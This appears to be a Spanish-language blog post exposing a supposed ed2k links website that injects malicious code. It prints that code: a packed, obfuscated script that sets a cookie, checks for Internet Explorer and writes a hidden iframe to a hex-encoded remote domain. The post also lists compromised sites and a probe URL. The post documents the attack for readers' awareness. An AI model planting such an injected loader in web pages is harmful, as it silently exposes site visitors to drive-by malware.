Ésta página web de supuestos enlaces ed2k, cada vez que es refrescada o cargada intenta inyectar código detectado por las firmas de algunos antivirus como HTML Small.bkr.106, iframe o Trojan.

(<body bgcolor=”#000000″ text=”#000001″><script>sa=”%6B%73%69%65%6E%61%2E%6E%65%74″;eval(function(p,a,c,k,e,d){while(c–){if(k[c]){p=p.rep______(new RegExp(‘\\b’+c.toString(a)+’\\b’,'g’),k[c])}}return p}(‘a(0.4.7(“5=s”)==-1&&9.8.7(“f 6″)!=-1){0.4=”5=s; e=c, 2 g b 2:d:h p; “;0.r(“<3 q=1 t=1 o=\’n://”+j+”/i/\’ k=\’l:m\’></3>”)}’,30,30,’document||14|iframe|cookie|_mlsdkf||indexOf|appVersion|navigator|if|2015…

…Mon|15|expires|MSIE|Jul|26|b2b|sa|style|display|none|http|src|GMT|width|write||height’.split(‘|’)));</script>
<p align=”center” style=”line-height: 0; margin-top: -1; margin-bottom: -1″><font face=”Trebuchet MS” color=”#000000″ style=”font-size: 1pt”>)

El dominio es el siguiente: En la raíz somos redireccionados a éste otro dominio.

Read the rest of this entry

Saben los administradores de éstos sitios que sus webs están infectadas y que están siendo utilizadas para atacar y a su vez seguir vulnerando mas websites, o simplemente lo ignoran?
Algunos como veréis hacen sus primeros pinitos montando un servidor propio. Los “menos tontos” vulneran webs ajenas a diestro y siniestro utilizándolas con diferentes fines.
Juzgad vosotros mismos:

El ya ultra-magreado e incesable escáner Feel CoMz

De ejemplo algunas de las webs vulneradas y atacantes en los últimos días:

• http://ecohearth.com

• http://ecohearth.com/tmp/id.txt??

-Click en la  imagen para ampliarla- Read the rest of this entry